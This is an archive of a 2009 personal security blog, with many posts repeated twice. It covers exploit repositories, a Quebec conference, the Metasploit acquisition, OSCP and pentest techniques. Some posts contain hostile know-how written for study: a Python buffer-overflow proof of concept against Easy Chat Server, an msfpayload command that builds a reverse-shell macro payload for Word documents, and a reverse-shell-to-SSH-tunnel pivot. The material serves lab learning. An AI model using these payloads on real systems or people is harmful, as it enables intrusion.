But how is the site better. Let's start off by how everything is organized. It's separated in few sections. Remote Exploit, local exploit, web application and denial of service. The old milw0rm had a similar organizational schema, and they even had (or have I suppose... it's still up) a shell code section. Which for me was not very user friendly. What it didn't have was a web application section, which in my opinion is a good add-on by the Offsec crew. Even if they removed a few of the sections originality found on milw0rm, the new site is very easy to navigate.
The search option is also better all around. Searching by description, author, type (remote/local/DoS/etc), platform and port number. It's pretty quick too and gives out very good search results. The submit information is revamped and easy to follow to anyone who wishes to submit anything.
This last part is what makes this site stand-out from the rest. They are actually hosting the applications associated with the exploits. Not all of them mind you, but they do have many downloads available. So in time, I'm sure we'll see lots more vulnerable applications with their respective exploits ready to be transferred in our lab environment.
So in the end, Offensive-Security have legitimized the existence of such a site. With this new avenue, an exploit repository site doesn't have cater to "blackhats" looking to annoy people or deface websites. They are maintaining and making available a valuable knowledge base for the security professional in training.
Congrats to all that worked on the new site. It's fresh, good looking and I'm sure it's going to be around for a long long time...
Check them out:
Offensive-Security
New milw0rm
Sunday, November 8, 2009
Hackfest.ca 2009
Well, yesterday I attended my first infosec convention/conference in Quebec City: Hackfest. I must say it was great! Since I have nothing to compare it to (as far as information security related conventions), I'll compare it to the few conventions I did attend in the past.. IT an non IT related. The result is still the same, it was a great learning experience.
The convention was organized by Patrick R. Mathieu, Nicolas-Loic Fortin and Michel Cusin. It was held at the "Hotel Universel" across the street from where it was initial intended (University of Laval). They needed to move out of the University due to the swine flu vaccination campaign, and this with only 3 weeks notice... If they hadn't mentioned it, we never would've noticed. The whole thing was well organized right down to the free RedBull. Smooth, on time and with people behaving correctly all went like clock work.
The day started with registrations at 8am, and ended with lock-picking and a CTF event. Unfortunately due to health issues, I couldn't stay to watch the activities... guess it's just good luck I didn't register for the event, I wouldn't have been able to participate.
9h15am The first speakers of the conference, Eric Gingras and Sebastien Duquette. Their topic was "fuzzing in a pentest". Complete with slides and an entertaining demonstration. It was a good talk to kick off the day.
10h15 This talk was a bit over my head, seeing I'm not a PHP coder. Nonetheless it was extremely interesting. Auditing PHP code for security reasons. It open my eyes to how easy it is to make your server hosting the code vulnerable to attack. This must have made a few coders happy (and a bit scared I hope).
11h30 Botrax came on to explain how the "law" worked, and how it's applied to a "Human" and a "person". Yes according to the law's definition, these two are not the same. You would be surprised how much impact this makes. As for how this applied to White Hat hacker and black... well you needed some imagination. Overall it was worth the hour.
13h30 Henry Stern, senior Security Engineer spooke about social sites attacks in various forms. At the end, seeing the whole crowed attending are computer savvy, we still got a few surprises. I can just imagine now, for the average user, how badly their computers are infected with false anti-virus software.
15h00 David Girard came on to talk about vulnerabilities in virtual machine architecture. Speaking about different technologies used for visualization.. and no VMWare is not the only one. Very eye-opening.. moral of the story update everything when you can, especially if you're running ESX
16h15 Guy Brunneau from SANS spoke about packet analysis and retrieving file directly out of wireshark session. For me this was new. Knowing it was possible, now I have a pretty good idea on how to do it. Again very informative.
17h15 It was Mick Douglas from pauldotcom security weekly's turn to take the stage. This guy is the reason (at least the major reason) I decided to attend. His topic "Offense is the new Defense" was a fresh outlook on how blue team, or system/security/network administrators should act/react to an attack the system. He was obviously passionate about the topic.
After all the talks were done, the lock-picking and CTF started. I stuck around to see all the various laptops boot up and get ready for war. Seeing I have no experience in a CTF (closest thing I've done is OSCP) it was quite impressive. Well organized, enough hardware to supply all teams with an IP the whole setup seemed to be ready in an hour. Great job guys! No waiting for the participants, I'm sure they appreciated it.
To finish this off now, must say it was a great experience and something I hope they are able to redo next year. Canada/Quebec need conventions like these. We can't all afford to go to Shmoocon/DefCon. Not all employers are ready to send their admins to such events either. So me and my colleagues that attended this event, feel that not only this convention is fun and useful, it's essential for Quebec's security consultants and techs be on top of the black-hats.
I spoke to Michel Cusin before leaving, congratulating him and offering any help he may need for next year's event. I truly believe in this event now. I hope he just remembers that a stranger took to the time offer his help. :)
The convention was organized by Patrick R. Mathieu, Nicolas-Loic Fortin and Michel Cusin. It was held at the "Hotel Universel" across the street from where it was initial intended (University of Laval). They needed to move out of the University due to the swine flu vaccination campaign, and this with only 3 weeks notice... If they hadn't mentioned it, we never would've noticed. The whole thing was well organized right down to the free RedBull. Smooth, on time and with people behaving correctly all went like clock work.
The day started with registrations at 8am, and ended with lock-picking and a CTF event. Unfortunately due to health issues, I couldn't stay to watch the activities... guess it's just good luck I didn't register for the event, I wouldn't have been able to participate.
9h15am The first speakers of the conference, Eric Gingras and Sebastien Duquette. Their topic was "fuzzing in a pentest". Complete with slides and an entertaining demonstration. It was a good talk to kick off the day.
10h15 This talk was a bit over my head, seeing I'm not a PHP coder. Nonetheless it was extremely interesting. Auditing PHP code for security reasons. It open my eyes to how easy it is to make your server hosting the code vulnerable to attack. This must have made a few coders happy (and a bit scared I hope).
11h30 Botrax came on to explain how the "law" worked, and how it's applied to a "Human" and a "person". Yes according to the law's definition, these two are not the same. You would be surprised how much impact this makes. As for how this applied to White Hat hacker and black... well you needed some imagination. Overall it was worth the hour.
13h30 Henry Stern, senior Security Engineer spooke about social sites attacks in various forms. At the end, seeing the whole crowed attending are computer savvy, we still got a few surprises. I can just imagine now, for the average user, how badly their computers are infected with false anti-virus software.
15h00 David Girard came on to talk about vulnerabilities in virtual machine architecture. Speaking about different technologies used for visualization.. and no VMWare is not the only one. Very eye-opening.. moral of the story update everything when you can, especially if you're running ESX
16h15 Guy Brunneau from SANS spoke about packet analysis and retrieving file directly out of wireshark session. For me this was new. Knowing it was possible, now I have a pretty good idea on how to do it. Again very informative.
17h15 It was Mick Douglas from pauldotcom security weekly's turn to take the stage. This guy is the reason (at least the major reason) I decided to attend. His topic "Offense is the new Defense" was a fresh outlook on how blue team, or system/security/network administrators should act/react to an attack the system. He was obviously passionate about the topic.
After all the talks were done, the lock-picking and CTF started. I stuck around to see all the various laptops boot up and get ready for war. Seeing I have no experience in a CTF (closest thing I've done is OSCP) it was quite impressive. Well organized, enough hardware to supply all teams with an IP the whole setup seemed to be ready in an hour. Great job guys! No waiting for the participants, I'm sure they appreciated it.
To finish this off now, must say it was a great experience and something I hope they are able to redo next year. Canada/Quebec need conventions like these. We can't all afford to go to Shmoocon/DefCon. Not all employers are ready to send their admins to such events either. So me and my colleagues that attended this event, feel that not only this convention is fun and useful, it's essential for Quebec's security consultants and techs be on top of the black-hats.
I spoke to Michel Cusin before leaving, congratulating him and offering any help he may need for next year's event. I truly believe in this event now. I hope he just remembers that a stranger took to the time offer his help. :)
Wednesday, November 4, 2009
str0ke 1974-04-29 - 2009-11-03
As reported from Black Security blog not too long ago, Milw0rn's founder passed away from heart complications.
He leaves a wife and 4 children.
My thoughts and prayers go out to his wife and children, and the rest of his family. I never knew str0ke (1 email doesn't count as knowing someone), but as a fellow human being... a father... a husband, I can't help feel sadden by this moment.
Please read Black Security's blog entry on the subject, for he is in a better position to talk about the situation.
May whatever god you believe in str0ke, keeps your soul safe and happy for the rest of eternity.
----
EDIT: It appears that this was someone's bad idea for a joke. Let's just hope this didn't cause him AND his family too much unwanted farewell e-mails...
Thanks ronin2307..
----
He leaves a wife and 4 children.
My thoughts and prayers go out to his wife and children, and the rest of his family. I never knew str0ke (1 email doesn't count as knowing someone), but as a fellow human being... a father... a husband, I can't help feel sadden by this moment.
Please read Black Security's blog entry on the subject, for he is in a better position to talk about the situation.
May whatever god you believe in str0ke, keeps your soul safe and happy for the rest of eternity.
----
EDIT: It appears that this was someone's bad idea for a joke. Let's just hope this didn't cause him AND his family too much unwanted farewell e-mails...
Thanks ronin2307..
----
Sunday, October 25, 2009
Metasploit no longer a hobby
It's official, the Metasploit project convinced by HD Moore has been acquired by Rapid7 an Information Security company (better known for it's vulnerability assessment product NeXpose).
What does this mean for the future of this great open source project that many have learned to love (and I suppose hate) over the years? Well, according to it's creator it can only make it better. Having Metasploit go commercial means a budget, an actual QA departement, a full time dev-team and more quality exploits.
Here are a few things that Rapid7 had to say:
"As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues. The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry."
That sounds pretty good, but something does bother me. "The exploit data will be directly embedded in our vulnerability management solution NeXpose" As far as I'm concerned, this means NeXpose will be feeding off Metasploit's better parts. Guess it's normal, they just acquired it and can probably do what ever they please. Making NeXpose an even better product in the end. What will happen when Metasploit has nothing left to feed it? What will happen then?
"Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants..."
Does this mean, eventually Metasploit will depend on NeXpose? Should we expect sometime in the future a message saying something like "...this feature requires you install NeXpose..." ?
Another little bit that has brought me some concern comes from Moore's statement on his blog:
"From a user's perspective Metasploit will still be free. All of the important bits are going to remain open-source..."
Which important bits? Let's face it, the whole framework is pretty important and down right incredible. Will the exploit be Open Source? Will it be the framework's inner workings? I guess only time will tell...
Don't get me wrong, I am extremely happy for Mr.Moore and the rest of the Metasploit team. They created an Open Source application to help the community. If they can make money and continue working on something they started off as a hobby... Well Congratulations! I don't think anyone would object to that. Let's face it, having a piece of code (big or small) being picked up by a commercial enterprise must be rewarding as hell.
My concern is, what will happen to Metasploit down the road... after a few years. History has a tendency to repeat itself. In the past Open Source projects acquired by commercial entities have been known to slowly, but surely, transform the Open Source product into a closed one. Of course this is not always the case.
Another thing, what will happen to Offensive Security's MSF certification? Will they have as much support and cooperation now to keep the study material up-to-date? Will they be limited by the bits of the project that will not be Open Source? Then again, it may not be affected at all.
_______
EDIT:
As mentioned by muts (Mati Aharoni lead developer of Back|Track and CEO of Offensive Security), I guess MSFU won't suffer from Metasploit's acquisition. Sorry muts for not seeing (or reading) that detail.
Offensive Security Official MSF training partner
_______
So to end this, again congratulations are in order to the whole Metasploit team. I'm extremely happy for you all. Transforming a hobby into career is not always easy.
Good luck, have fun
Metasploit/Rapid7 FAQ
What does this mean for the future of this great open source project that many have learned to love (and I suppose hate) over the years? Well, according to it's creator it can only make it better. Having Metasploit go commercial means a budget, an actual QA departement, a full time dev-team and more quality exploits.
Here are a few things that Rapid7 had to say:
"As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues. The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry."
That sounds pretty good, but something does bother me. "The exploit data will be directly embedded in our vulnerability management solution NeXpose" As far as I'm concerned, this means NeXpose will be feeding off Metasploit's better parts. Guess it's normal, they just acquired it and can probably do what ever they please. Making NeXpose an even better product in the end. What will happen when Metasploit has nothing left to feed it? What will happen then?
"Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants..."
Does this mean, eventually Metasploit will depend on NeXpose? Should we expect sometime in the future a message saying something like "...this feature requires you install NeXpose..." ?
Another little bit that has brought me some concern comes from Moore's statement on his blog:
"From a user's perspective Metasploit will still be free. All of the important bits are going to remain open-source..."
Which important bits? Let's face it, the whole framework is pretty important and down right incredible. Will the exploit be Open Source? Will it be the framework's inner workings? I guess only time will tell...
Don't get me wrong, I am extremely happy for Mr.Moore and the rest of the Metasploit team. They created an Open Source application to help the community. If they can make money and continue working on something they started off as a hobby... Well Congratulations! I don't think anyone would object to that. Let's face it, having a piece of code (big or small) being picked up by a commercial enterprise must be rewarding as hell.
My concern is, what will happen to Metasploit down the road... after a few years. History has a tendency to repeat itself. In the past Open Source projects acquired by commercial entities have been known to slowly, but surely, transform the Open Source product into a closed one. Of course this is not always the case.
Another thing, what will happen to Offensive Security's MSF certification? Will they have as much support and cooperation now to keep the study material up-to-date? Will they be limited by the bits of the project that will not be Open Source? Then again, it may not be affected at all.
_______
EDIT:
As mentioned by muts (Mati Aharoni lead developer of Back|Track and CEO of Offensive Security), I guess MSFU won't suffer from Metasploit's acquisition. Sorry muts for not seeing (or reading) that detail.
Offensive Security Official MSF training partner
_______
So to end this, again congratulations are in order to the whole Metasploit team. I'm extremely happy for you all. Transforming a hobby into career is not always easy.
Good luck, have fun
Metasploit/Rapid7 FAQ
Sunday, October 18, 2009
Recovering Firefox Passwords
A few weeks ago, Larry from Pauldotcom had a tech-segment about recovering Firefox passwords.
Seeing that this segment is well written, and it's a subject that always fascinates me. I see no point in trying to write up another, when I could just link to it.
Pauldotcom, episode 166
Hope you enjoy it as much as I did.
Seeing that this segment is well written, and it's a subject that always fascinates me. I see no point in trying to write up another, when I could just link to it.
Pauldotcom, episode 166
Hope you enjoy it as much as I did.
Thursday, October 1, 2009
We don't mean to be insecure
Don't want to sound preachy, but system administrators and network administrators are not always to blame for insecure systems. Sometimes (often) the blame falls on the heads of management.
Keeping a system up to date, fully patched and properly configured after words will usually keep any system relatively secure... until the next exploit comes out and is made public.
Doing this takes time. One needs to make sure applied patches won't affect running services (i.e Framework 3.5 SP1 on Citrix Presentation Server -this one seems solved now). Lots of reading and testing should be done before deploying major changes. For us, the tech-guys, this is normal and the sensible thing to do. It's our job to keep things running smoothly... For management, time equals money... and they seem to always have the mentality "..if it ain't broke don't fix it..." Of course, when a system gets compromised or crashes it's our fault for not applying the proper updates and patches.
Recently I had the pleasure of showing my current employer how easy it would be to compromise a customer's system. Without raising any alarms or triggering an malware/anti-virus application I got a reserve shell on my home computer. Must admit, he was surprised how easy it was. Unfortunately nothing came out of that demonstration. I even spoke about a customer's FTP server, and how we should updated it seeing the amount of DoS exploits and local privilege escalation exploits currently in the wild... Again nothing.
So, from where I'm sitting we are not at fault. Pretty sure it's the same for others...
< /rant>
Keeping a system up to date, fully patched and properly configured after words will usually keep any system relatively secure... until the next exploit comes out and is made public.
Doing this takes time. One needs to make sure applied patches won't affect running services (i.e Framework 3.5 SP1 on Citrix Presentation Server -this one seems solved now). Lots of reading and testing should be done before deploying major changes. For us, the tech-guys, this is normal and the sensible thing to do. It's our job to keep things running smoothly... For management, time equals money... and they seem to always have the mentality "..if it ain't broke don't fix it..." Of course, when a system gets compromised or crashes it's our fault for not applying the proper updates and patches.
Recently I had the pleasure of showing my current employer how easy it would be to compromise a customer's system. Without raising any alarms or triggering an malware/anti-virus application I got a reserve shell on my home computer. Must admit, he was surprised how easy it was. Unfortunately nothing came out of that demonstration. I even spoke about a customer's FTP server, and how we should updated it seeing the amount of DoS exploits and local privilege escalation exploits currently in the wild... Again nothing.
So, from where I'm sitting we are not at fault. Pretty sure it's the same for others...
< /rant>
Saturday, September 26, 2009
Little updates...
Some new, and not so new things to mention.
Firstly, Offensive Security's Metasploit Unleashed.
The course material, available free of charge here, is finally out. Sometime next month the exam and an additional course video will be made available for a small fee. It must be mentioned, the money raised by this course is donated to the "I Hack for Charity" created by Johnny Long. So by taking the course, you are not only learning to use a valuable penetration and assessment tool, you are giving to a good cause.
---
A little quicky on how to update Backtrack 4 's kernel.
root@bt4# apt-get update
root@bt4# apt-get install -d linux-image
root@bt4# cd /var/cache/apt/archives/
root@bt4# dpkg -i –force all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
root@bt4# apt-get dist-upgrade
I suggest a reboot here to see if all is good (should see 2 kernels available at the grub scree)
root@bt4# apt-get remove --purge 2.6.29*
root@bt4# reboot
Again with Backtrack 4: If you plan on using Hydra (or XHydra) against SSH, you might be in for a little surprise. The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries. You'll need to recompile it. I found a nice how to on the Remote Exploit forum (full thread). Also, it's the same for Medusa too, so redoing that is needed as well...
# Download the hydra source, untar it, etc.
# ./configure
# nano Makefile
Edit the following lines to look like this, POSTGRES appears to be screwing stuff up in my case.
XDEFINES= -DLIBOPENSSL -DLIBSSH
XLIBS= -lssl -lssh -lcrypto
#make
#make install
If this doesn't work, do what I did... Download the library and read the error messages. It's all clearly explained...
----
A quick note, another Joomla exploit has been released not too long ago (no big surprise), but what makes me mention this is the timing in which it came out. Seeing that I work for an ISP and Web/Application hosting company, being aware of these things can sometimes come in handy.
Two days after this exploit being published, I was asked by one of our partners he needed a web space setup with Joomla. The boss told me to make it happen, knowing it was full of vulnerabilities he says
"...put the latest version please...".
In response "Sure no problem, but just got to tell you that a remote exploit came out on that version 2 days ago".
It hasn't been installed.
Sometimes the power if knowledge and a little assurance in one's speech and go along way.
Firstly, Offensive Security's Metasploit Unleashed.
The course material, available free of charge here, is finally out. Sometime next month the exam and an additional course video will be made available for a small fee. It must be mentioned, the money raised by this course is donated to the "I Hack for Charity" created by Johnny Long. So by taking the course, you are not only learning to use a valuable penetration and assessment tool, you are giving to a good cause.
---
A little quicky on how to update Backtrack 4 's kernel.
root@bt4# apt-get update
root@bt4# apt-get install -d linux-image
root@bt4# cd /var/cache/apt/archives/
root@bt4# dpkg -i –force all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
root@bt4# apt-get dist-upgrade
I suggest a reboot here to see if all is good (should see 2 kernels available at the grub scree)
root@bt4# apt-get remove --purge 2.6.29*
root@bt4# reboot
Again with Backtrack 4: If you plan on using Hydra (or XHydra) against SSH, you might be in for a little surprise. The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries. You'll need to recompile it. I found a nice how to on the Remote Exploit forum (full thread). Also, it's the same for Medusa too, so redoing that is needed as well...
# Download the hydra source, untar it, etc.
# ./configure
# nano Makefile
Edit the following lines to look like this, POSTGRES appears to be screwing stuff up in my case.
XDEFINES= -DLIBOPENSSL -DLIBSSH
XLIBS= -lssl -lssh -lcrypto
#make
#make install
If this doesn't work, do what I did... Download the library and read the error messages. It's all clearly explained...
----
A quick note, another Joomla exploit has been released not too long ago (no big surprise), but what makes me mention this is the timing in which it came out. Seeing that I work for an ISP and Web/Application hosting company, being aware of these things can sometimes come in handy.
Two days after this exploit being published, I was asked by one of our partners he needed a web space setup with Joomla. The boss told me to make it happen, knowing it was full of vulnerabilities he says
"...put the latest version please...".
In response "Sure no problem, but just got to tell you that a remote exploit came out on that version 2 days ago".
It hasn't been installed.
Sometimes the power if knowledge and a little assurance in one's speech and go along way.
Saturday, September 12, 2009
BoF Exersice
Something that I enjoy doing, and which helps understanding buffer overflows / exploit coding is practice.
Grabe a known vulnerable application, find a PoC (proof of concept) and start from there. Here's a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2
-First find and download the application (trial version should do fine) try -this-
-Install the application (make sure it works)
-Get a debugger (I suggest Ollydbg)
-Copy paste this PoC, it's python but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own Easy Chat Server
[this is based on his0k4 's exploit on milw0rm]
==================================================
#!/usr/bin/python
#Bug :
#EFS Easy Chat Server Authentication Request
#Buffer Overflow Exploit (SEH)
import struct
import socket
buffer = '\x41' * 600
head = "GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1\r\n"
head += "Host: 192.168.1.200\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.200',8080))
s.send(head + "\r\n\r\n")
s.close()
==================================================
Got this to work under Windows XP Pro SP3 English. Good practice...
Use the links I provided in a previous post and have fun.
Good luck
Grabe a known vulnerable application, find a PoC (proof of concept) and start from there. Here's a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2
-First find and download the application (trial version should do fine) try -this-
-Install the application (make sure it works)
-Get a debugger (I suggest Ollydbg)
-Copy paste this PoC, it's python but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own Easy Chat Server
[this is based on his0k4 's exploit on milw0rm]
==================================================
#!/usr/bin/python
#Bug :
#EFS Easy Chat Server Authentication Request
#Buffer Overflow Exploit (SEH)
import struct
import socket
buffer = '\x41' * 600
head = "GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1\r\n"
head += "Host: 192.168.1.200\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.200',8080))
s.send(head + "\r\n\r\n")
s.close()
==================================================
Got this to work under Windows XP Pro SP3 English. Good practice...
Use the links I provided in a previous post and have fun.
Good luck
Monday, September 7, 2009
BoF explained
Well, it's been a while since I've posted. Family and work are taking most of my time. Also started practicing with Exploit codes and Buffer Overflows. Taking an application with a known vulnerability, then starting with a working PoC writing an exploit from there.
I would love to take the time and write up my experiences in this matter, but seeing that there are hundreds of websites/posts on this subject, I'll just post 2 of my favorites. Well written and very understandable.
Peter Van Eeckhoutte's blog
i-Hacked.com 's article on SEH BoFs
Enjoy...
I would love to take the time and write up my experiences in this matter, but seeing that there are hundreds of websites/posts on this subject, I'll just post 2 of my favorites. Well written and very understandable.
Peter Van Eeckhoutte's blog
i-Hacked.com 's article on SEH BoFs
Enjoy...
Sunday, August 2, 2009
A journey's End...
Well, my experience with Offsec 101 (or PWB) is complete. Finished the course material and the lab time. I took 60 days total, not knowing what I was exactly getting myself into. Also this is not a course where one can just "pop in" for a few hours here and there. Complete concentration for several hours in a row is needed, and this everyday.
This said, I'm pleased to announce that passed the OSCP. Got my official results yesterday.
Can't go into details about the exam of course, like any certification one agrees (or signs) a NDA. But I suppose It's safe to say the major part of the exam is breaking into systems. It's public knowledge the exam is 24 hours, and one would be foolish not to take advantage of this. Also, one would be foolish not to take regular breaks and one or two naps. A tired mind is no good during this period. 24 hours may seems like a long time, but believe me it goes by quickly.
In the end, I accomplished enough of the requirements to pass the exam at hour 22. Took several 15 or 30 minute breaks, and a total sleep time of about 6 hours (2 hour nap, and a good sleep of 4). So it's very do-able without having to stay awake 24 hours straight.
My experience started on August 8th, 2009 at 10amEDT when I received my exam package with details on what needed to be accomplished. Like the lab environment, certain restrictions are lined out and specific tasks are given. Once I had understood the task(s) at hand, then I could panic. About 30 minutes later, I started hacking away at the lab the way to course showed me. I did not feel "confident" but prepared.
It was hit and miss for a while, lots of information gathered then research needed to be made. After a while, boxes started giving me their most prized possession... administrative rights to their system.
At around 8amEDT the next day, I popped my last machine that necessary points (and then some) to unofficially pass the OSCP challenge... I could relax. From then on, I enjoyed myself a bit more... but didn't manage to get that last box I wanted (and i was close...) After another nap, I started to clean up my documentation and sent it on its way for evaluation. The rest is history.
Would like to thank ziplock, muts, bolexxx and the rest of the Offsec team for this great adventure. The IRC channel (#offsec) on freenode.net also for the great support, kindness and occasional helping hand...
I highly recommend this certification. If you want to learn new skills, or test out what you know (or think you know) this is the one. It will make you think and adapt.
This said, I'm pleased to announce that passed the OSCP. Got my official results yesterday.
Can't go into details about the exam of course, like any certification one agrees (or signs) a NDA. But I suppose It's safe to say the major part of the exam is breaking into systems. It's public knowledge the exam is 24 hours, and one would be foolish not to take advantage of this. Also, one would be foolish not to take regular breaks and one or two naps. A tired mind is no good during this period. 24 hours may seems like a long time, but believe me it goes by quickly.
In the end, I accomplished enough of the requirements to pass the exam at hour 22. Took several 15 or 30 minute breaks, and a total sleep time of about 6 hours (2 hour nap, and a good sleep of 4). So it's very do-able without having to stay awake 24 hours straight.
My experience started on August 8th, 2009 at 10amEDT when I received my exam package with details on what needed to be accomplished. Like the lab environment, certain restrictions are lined out and specific tasks are given. Once I had understood the task(s) at hand, then I could panic. About 30 minutes later, I started hacking away at the lab the way to course showed me. I did not feel "confident" but prepared.
It was hit and miss for a while, lots of information gathered then research needed to be made. After a while, boxes started giving me their most prized possession... administrative rights to their system.
At around 8amEDT the next day, I popped my last machine that necessary points (and then some) to unofficially pass the OSCP challenge... I could relax. From then on, I enjoyed myself a bit more... but didn't manage to get that last box I wanted (and i was close...) After another nap, I started to clean up my documentation and sent it on its way for evaluation. The rest is history.
Would like to thank ziplock, muts, bolexxx and the rest of the Offsec team for this great adventure. The IRC channel (#offsec) on freenode.net also for the great support, kindness and occasional helping hand...
I highly recommend this certification. If you want to learn new skills, or test out what you know (or think you know) this is the one. It will make you think and adapt.
Good to have links
Here's a collection of links that are always useful to have handy:
www.milw0rm.com
www.securityfocus.com
www.securiteam.com
www.offensive-security.com (resource section)
www.packetstormsecurity.org
www.pauldotcom.com
www.metasploit.org
www.governmentsecurity.org
Now I'm sure there are more out there and would be worth adding to this list. If you've read my first post, you'll understand that I'm new to information security... hence my limited knowledge. Feel free to add, if someone ever comments.
www.milw0rm.com
www.securityfocus.com
www.securiteam.com
www.offensive-security.com (resource section)
www.packetstormsecurity.org
www.pauldotcom.com
www.metasploit.org
www.governmentsecurity.org
Now I'm sure there are more out there and would be worth adding to this list. If you've read my first post, you'll understand that I'm new to information security... hence my limited knowledge. Feel free to add, if someone ever comments.
Saturday, August 1, 2009
Msfpayload 'V' option
A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool. As always, his videos are extremely interesting (although he does talk pretty fast in this one). Pauldotcom Ep 161
So basically this a client side attack, and in my opinion at pretty nasty one too. Every time I've seen someone open up a word document, or excel spreadsheet, either downloaded off the Web or received via e-mail. 99% of the time people either let the macros run or already have the security settings set to low.
What does this mean? Well using the "V" option in msfpayload will output the payload as a vbscript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs of course).
I've actually tried it, and it's pretty funny (and scary) getting a revese shell because I opened a Word document.
So here's a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site.
From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.1.10.53 V > /tmp/vbrshell.bas
Once the file is created, just insert that in a nice Word document..
Here's another video posted by Mark Baggett which explains the process.
Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file.
So basically this a client side attack, and in my opinion at pretty nasty one too. Every time I've seen someone open up a word document, or excel spreadsheet, either downloaded off the Web or received via e-mail. 99% of the time people either let the macros run or already have the security settings set to low.
What does this mean? Well using the "V" option in msfpayload will output the payload as a vbscript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs of course).
I've actually tried it, and it's pretty funny (and scary) getting a revese shell because I opened a Word document.
So here's a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site.
From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.1.10.53 V > /tmp/vbrshell.bas
Once the file is created, just insert that in a nice Word document..
Here's another video posted by Mark Baggett which explains the process.
Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file.
Friday, July 17, 2009
Firefox upgrades 3.5
Not long ago, Firefox released version 3.5... Happy news! Unfortunately a Heap Spray Vulnerability was found not long after... not good. Here's a small article on the subject -here-
Here's a proof of concept exploit to see the vulnerability in action:
Milw0rm
Fortunatly for us, Firefox has issued an update. So don't forget to update your newly upgrade Firefox.
Here's a proof of concept exploit to see the vulnerability in action:
Milw0rm
Fortunatly for us, Firefox has issued an update. So don't forget to update your newly upgrade Firefox.
Wednesday, July 15, 2009
A little info about Sympatico Wifi
Nothing really technical today, just an opinion on a popular ISP in my area.
Bell Sympatico
When one subscribes, they are offered the choice to receive a wireless router. As an added bonus for people that may not be able to configure the device. It either comes pre-configured, or a technician can swing by and set it up for you.
That's about the only good thing about the service. As Bob mentioned to me not long ago, he found a few security issues that alarmed me.
For starters, the router is configured by default with WEP which can be easily cracked using air-crack. The default WEP key is actually the router's serial number. Lastly, and this is what made me jump, there is no username & password on the router... by default! As Bob was telling me, he managed to crack a few WEP keys and enter these "secure" routers provided by one of the biggest ISPs in Canada. The router has many options, such as opening and closing ports. Redirecting traffic.. just to name a few. The worst part, it never asks for a password when saving these new settings.
Another thing that surprised me is that this router also acts as the client's modem. So along with all the local network's information found on the device, you can also retrieve the username and password to the customer's internet connection.
I know for a fact, that often clients with no wireless devices receive these routers so as to setup a local network easily. What does this mean? A vulnerable network, and who knows what it may contain and who may attack it. Now knowing all of this, what would stop someone from coding a virus/worm/trojan to take advantage of this? I don't know, I suppose its possible, I mean look at Conficker and all it did (and doing). In my opinion, ISPs giving away these unsecure devices and not taking the time to configuring them with a minimum of protection aren't helping.
Probably, involuntarily of course, are even helping the spread of malware on the net.
Bell Sympatico
When one subscribes, they are offered the choice to receive a wireless router. As an added bonus for people that may not be able to configure the device. It either comes pre-configured, or a technician can swing by and set it up for you.
That's about the only good thing about the service. As Bob mentioned to me not long ago, he found a few security issues that alarmed me.
For starters, the router is configured by default with WEP which can be easily cracked using air-crack. The default WEP key is actually the router's serial number. Lastly, and this is what made me jump, there is no username & password on the router... by default! As Bob was telling me, he managed to crack a few WEP keys and enter these "secure" routers provided by one of the biggest ISPs in Canada. The router has many options, such as opening and closing ports. Redirecting traffic.. just to name a few. The worst part, it never asks for a password when saving these new settings.
Another thing that surprised me is that this router also acts as the client's modem. So along with all the local network's information found on the device, you can also retrieve the username and password to the customer's internet connection.
I know for a fact, that often clients with no wireless devices receive these routers so as to setup a local network easily. What does this mean? A vulnerable network, and who knows what it may contain and who may attack it. Now knowing all of this, what would stop someone from coding a virus/worm/trojan to take advantage of this? I don't know, I suppose its possible, I mean look at Conficker and all it did (and doing). In my opinion, ISPs giving away these unsecure devices and not taking the time to configuring them with a minimum of protection aren't helping.
Probably, involuntarily of course, are even helping the spread of malware on the net.
Saturday, July 11, 2009
Simple SSH tunnel
An SSH tunnel encrypts traffic and access non-routable machines in a secure way.
Here's a nice wiki explaining the subject in more depth -here-
So let's imagine you've managed to receive a reserve shell from your target Windows machine. Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack (How you got your reserve shell is not important).
Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting but that would be better explained with Metasploit). The exercise here is, how to gain access to this non routed port to your machine that is outside the network. The answer is a tunnel, and in our case an SSH tunnel.
First you'll need an SSH server on your system (the attacker), an SSH client on your target. This example assumes that outgoing traffic isn't limited or monitored. Remember this is just a simple exercise that can be easily accomplished at home on your local network.
